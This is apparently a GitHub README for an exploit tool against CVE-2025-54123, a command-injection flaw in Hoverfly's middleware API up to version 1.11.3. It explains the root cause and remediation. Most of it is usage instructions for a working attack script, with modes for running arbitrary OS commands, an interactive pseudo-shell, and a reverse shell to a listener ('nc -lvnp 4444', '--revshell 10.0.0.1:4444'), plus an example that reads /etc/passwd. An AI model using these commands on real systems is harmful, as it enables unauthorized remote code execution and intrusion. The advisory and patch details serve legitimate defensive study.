0x00phantom-hat/Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit

# CVE-2025-54123 — Hoverfly Middleware API Remote Code Execution ## Vulnerability Overview | Property | Value | |-----------------|-----------------------------------------------------------------------| | **CVE ID** | [CVE-2025-54123](https://nvd.nist.gov/vuln/detail/CVE-2025-54123) | | **CVSS Score** | **9.8 — Critical** | | **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` | | **CWE** | CWE-78 (OS Command Injection), CWE-20 (Improper Input Validation) | | **Product** | [Hoverfly](https://github.com/SpectoLabs/hoverfly) — Open-source API simulation tool | | **Affected** | All versions up to and including **1.11.3** | | **Fixed In** | **1.12.0** ([patch commit](https://github.com/SpectoLabs/hoverfly/commit/17e60a9bc78826deb4b782dca1c1abd3dbe60d40)) | | **Advisory** | [GHSA-r4h8-hfp2-ggmf](https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf) | ## Technical Analysis Here's Case Study deep dive and technical analysis as white box and black box prespective https://medium.com/@phantom_hat/cve-2025-54123-hoverfly-1-11-3-command-injection-rce-case-study-patch-diffing-aacc092f7f3a ### Attack Surface Hoverfly exposes a RESTful admin API (default port `8888`) for managing simulation configurations. The middleware management endpoint at **`/api/v2/hoverfly/middleware`** accepts a JSON body with `binary` and `script` fields that define an external middleware process. ### Root Cause The vulnerability is born from a combination of **three code-level flaws**: 1. **Insufficient Input Validation** — [`middleware.go:93-96`](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/middleware.go#L93): The `SetBinary()` function accepts the `binary` parameter without any validation or sanitisation, allowing an attacker to specify arbitrary executables (e.g., `bash`). 2. **Unsafe Command Execution** — [`local_middleware.go:14-19`](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/local_middleware.go#L13): The middleware is executed via `exec.Command()` with the attacker-controlled `binary` and `script` values passed directly as arguments, enabling OS command injection. 3. **Immediate Execution During Testing** — [`hoverfly_service.go:173`](https://github.com/SpectoLabs/hoverfly/blob/master/core/hoverfly_service.go#L173): When the middleware is set via the API, Hoverfly immediately tests the middleware by executing it, triggering the injected command at configuration time rather than at proxy-intercept time. ### Attack Flow Attacker Hoverfly (≤ 1.11.3) │ │ │─── POST /api/token-auth ──────────────>│ (1) Authenticate │<── { "token": "eyJ..." } ─────────────│ │ │ │─── PUT /api/v2/hoverfly/middleware ───>│ (2) Inject payload │ { "binary": "bash", │ │ "script": "" } │ │ │ │ ┌──────────────────────────────────┐│ │ │ exec.Command("bash", tmpScript) ││ (3) Immediate execution │ │ → attacker command runs as ││ │ │ the Hoverfly process user ││ │ └──────────────────────────────────┘│ │ │ │<── Command output in error response ──│ (4) Exfiltrate output │ │ ## Exploit Usage ### Prerequisites - Python 3.8+ - Valid credentials for the Hoverfly admin API (default: `admin` / configurable password) ### Installation git clone https://github.com//CVE-2025-54123.git cd CVE-2025-54123 pip install -r requirements.txt ### Modes of Operation #### Check-Only Mode Verify target reachability and authentication without exploitation: python3 exploit.py -u http://target:8888 -U admin -P -C #### Single Command Execution Execute a single OS command on the target: python3 exploit.py -u http://target:8888 -U admin -P -c 'id' #### Interactive Pseudo-Shell Drop into a persistent shell session: python3 exploit.py -u http://target:8888 -U admin -P -i #### Reverse Shell Send a reverse shell to your listener: # Terminal 1 — start listener nc -lvnp 4444 # Terminal 2 — launch exploit python3 exploit.py -u http://target:8888 -U admin -P --revshell 10.0.0.1:4444 #### Verbose Mode with Proxy Route traffic through Burp Suite for inspection: python3 exploit.py -u http://target:8888 -U admin -P -c 'cat /etc/passwd' --proxy -v ### Full Flag Reference | Flag | Description | Default | |---------------------|------------------------------------------|-----------| | `-u`, `--url` | Target Hoverfly URL | Required | | `-U`, `--username` | Admin username | Required | | `-P`, `--password` | Admin password | Required | | `-c`, `--command` | OS command to execute | — | | `-C`, `--check` | Check-only mode (no exploitation) | `false` | | `-i`, `--interactive` | Interactive pseudo-shell | `false` | | `--revshell` | Reverse shell `LHOST:LPORT` | — | | `--proxy` | Route through `127.0.0.1:8080` | `false` | | `--timeout` | Request timeout (seconds) | `15` | | `-v`, `--verbose` | Enable verbose output | `false` | ## Remediation | Action | Details | |--------|---------| | **Upgrade** | Update Hoverfly to **v1.12.0** or later, where the set middleware API is disabled by default | | **Network Segmentation** | Restrict access to the Hoverfly admin API (port `8888`) to trusted networks only | | **Authentication** | Use strong, unique passwords for the Hoverfly admin API | | **Monitoring** | Monitor for unexpected `PUT` requests to `/api/v2/hoverfly/middleware` | ### Patch Details The fix in [commit `17e60a9`](https://github.com/SpectoLabs/hoverfly/commit/17e60a9bc78826deb4b782dca1c1abd3dbe60d40) disables the set middleware API by default. Subsequent changes to documentation ([commit `a9d4da7`](https://github.com/SpectoLabs/hoverfly/commit/a9d4da7bd7269651f54542ab790d0c613d568d3e)) make users aware of the security implications of exposing this endpoint. ## References - [NVD — CVE-2025-54123](https://nvd.nist.gov/vuln/detail/CVE-2025-54123) - [GitHub Security Advisory — GHSA-r4h8-hfp2-ggmf](https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf) - [Vulnerable Code — hoverfly_service.go#L173](https://github.com/SpectoLabs/hoverfly/blob/master/core/hoverfly_service.go#L173) - [Vulnerable Code — middleware.go#L93](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/middleware.go#L93) - [Vulnerable Code — local_middleware.go#L13](https://github.com/SpectoLabs/hoverfly/blob/master/core/middleware/local_middleware.go#L13) - [Patch Commit — 17e60a9](https://github.com/SpectoLabs/hoverfly/commit/17e60a9bc78826deb4b782dca1c1abd3dbe60d40) ## Disclaimer ## Project Structure CVE-2025-54123/ ├── Exploit/ │ ├── exploit.py # Polished exploit │ └── raw_exploit.py # Original raw PoC ├── Images/ # Research screenshots ├── Reference/ # Reference exploits for study ├── requirements.txt # Python dependencies └── README.md # This file ## Author **Phantom Hat** — Security Researcher *This research was conducted as part of a vulnerability case study for educational purposes.*